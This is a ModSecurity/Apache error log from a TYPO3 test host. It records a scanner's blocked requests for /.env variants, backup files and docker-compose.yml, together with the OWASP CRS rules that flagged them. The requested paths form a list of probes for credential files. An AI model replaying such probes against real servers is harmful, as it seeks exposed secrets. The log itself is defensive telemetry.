[Sat Aug 09 06:06:21.782377 2025] [:error] [pid 1816104] [client 185.177.72.104:59520] [client 185.177.72.104] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJbJPZMSsodCmvqA9SDyJgAAAAQ"]
[Sat Aug 09 06:06:21.805877 2025] [authz_core:error] [pid 1816104] [client 185.177.72.104:59520] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml
[Sat Aug 09 11:47:16.572369 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJcZJKOhwtXACoBdcZpUPAAAAAg"]
[Sat Aug 09 11:47:16.573682 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJcZJKOhwtXACoBdcZpUPAAAAAg"]
[Sat Aug 09 11:47:16.573889 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJcZJKOhwtXACoBdcZpUPAAAAAg"]
[Sat Aug 09 11:47:16.594917 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJcZJKOhwtXACoBdcZpUPQAAAAg"]
[Sat Aug 09 11:47:16.595285 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJcZJKOhwtXACoBdcZpUPQAAAAg"]
[Sat Aug 09 11:47:16.595516 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJcZJKOhwtXACoBdcZpUPQAAAAg"]
[Sat Aug 09 11:47:16.637781 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aJcZJKOhwtXACoBdcZpUPgAAAAg"]
[Sat Aug 09 11:47:16.638139 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aJcZJKOhwtXACoBdcZpUPgAAAAg"]
[Sat Aug 09 11:47:16.638459 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aJcZJKOhwtXACoBdcZpUPgAAAAg"]
[Sat Aug 09 11:47:16.662738 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aJcZJKOhwtXACoBdcZpUPwAAAAg"]
[Sat Aug 09 11:47:16.663105 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aJcZJKOhwtXACoBdcZpUPwAAAAg"]
[Sat Aug 09 11:47:16.663354 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aJcZJKOhwtXACoBdcZpUPwAAAAg"]
[Sat Aug 09 11:47:16.684359 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJcZJKOhwtXACoBdcZpUQAAAAAg"]
[Sat Aug 09 11:47:16.684735 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJcZJKOhwtXACoBdcZpUQAAAAAg"]
[Sat Aug 09 11:47:16.685007 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJcZJKOhwtXACoBdcZpUQAAAAAg"]
[Sat Aug 09 11:47:16.705974 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJcZJKOhwtXACoBdcZpUQQAAAAg"]
[Sat Aug 09 11:47:16.706374 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJcZJKOhwtXACoBdcZpUQQAAAAg"]
[Sat Aug 09 11:47:16.706626 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJcZJKOhwtXACoBdcZpUQQAAAAg"]
[Sat Aug 09 11:47:16.727355 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aJcZJKOhwtXACoBdcZpUQgAAAAg"]
[Sat Aug 09 11:47:16.727629 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aJcZJKOhwtXACoBdcZpUQgAAAAg"]
[Sat Aug 09 11:47:16.727826 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aJcZJKOhwtXACoBdcZpUQgAAAAg"]
[Sat Aug 09 11:47:16.748324 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aJcZJKOhwtXACoBdcZpUQwAAAAg"]
[Sat Aug 09 11:47:16.748573 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aJcZJKOhwtXACoBdcZpUQwAAAAg"]
[Sat Aug 09 11:47:16.748758 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aJcZJKOhwtXACoBdcZpUQwAAAAg"]
[Sat Aug 09 11:47:16.769290 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJcZJKOhwtXACoBdcZpURAAAAAg"]
[Sat Aug 09 11:47:16.769534 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJcZJKOhwtXACoBdcZpURAAAAAg"]
[Sat Aug 09 11:47:16.769738 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJcZJKOhwtXACoBdcZpURAAAAAg"]
[Sat Aug 09 11:47:16.789799 2025] [authz_core:error] [pid 1817243] [client 185.177.72.201:28576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Sat Aug 09 11:47:16.810537 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aJcZJKOhwtXACoBdcZpURgAAAAg"]
[Sat Aug 09 11:47:16.810703 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aJcZJKOhwtXACoBdcZpURgAAAAg"]
[Sat Aug 09 11:47:16.810940 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aJcZJKOhwtXACoBdcZpURgAAAAg"]
[Sat Aug 09 11:47:16.811123 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aJcZJKOhwtXACoBdcZpURgAAAAg"]
[Sat Aug 09 11:47:16.831577 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.testing"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.testing"] [unique_id "aJcZJKOhwtXACoBdcZpURwAAAAg"]
[Sat Aug 09 11:47:16.831830 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.testing"] [unique_id "aJcZJKOhwtXACoBdcZpURwAAAAg"]
[Sat Aug 09 11:47:16.832011 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.testing"] [unique_id "aJcZJKOhwtXACoBdcZpURwAAAAg"]
[Sat Aug 09 11:47:16.852453 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.*.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.*.local"] [unique_id "aJcZJKOhwtXACoBdcZpUSAAAAAg"]
[Sat Aug 09 11:47:16.852698 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.*.local"] [unique_id "aJcZJKOhwtXACoBdcZpUSAAAAAg"]
[Sat Aug 09 11:47:16.852886 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.*.local"] [unique_id "aJcZJKOhwtXACoBdcZpUSAAAAAg"]
[Sat Aug 09 11:47:16.873458 2025] [:error] [pid 1817243] [client 185.177.72.201:28576] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aJcZJKOhwtXACoBdcZpUSQAAAAg"]
